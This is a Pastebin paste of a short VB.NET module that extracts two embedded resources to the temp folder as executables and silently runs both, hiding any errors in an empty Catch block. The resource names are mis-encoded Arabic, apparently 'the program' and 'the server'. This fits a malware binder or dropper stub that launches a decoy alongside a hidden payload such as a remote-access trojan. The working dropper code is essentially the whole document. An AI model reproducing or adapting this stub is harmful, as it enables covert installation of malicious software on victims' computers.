Advertisement
Guest User

Untitled

a guest
Feb 23rd, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. Module Fares
  2. Dim fareschennib1 As Object = My.Resources.ÇáÈÑäÇãÌ
  3. Dim fareschennib2 As Object = My.Resources.ÇáÓíÑÝÑ
  4. Sub main()
  5. Try
  6. Dim fareschennib3 = IO.Path.GetTempPath & "\" & "ÇáÈÑäÇãÌ.exe"
  7. IO.File.WriteAllBytes(fareschennib3, fareschennib1)
  8. Process.Start(fareschennib3)
  9. Dim fareschennib4 = IO.Path.GetTempPath & "\" & "ÇáÓíÑÝÑ.exe"
  10. IO.File.WriteAllBytes(fareschennib4, fareschennib2)
  11. Process.Start(fareschennib4)
  12. Catch ex As Exception
  13. End Try
  14. End Sub
  15. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement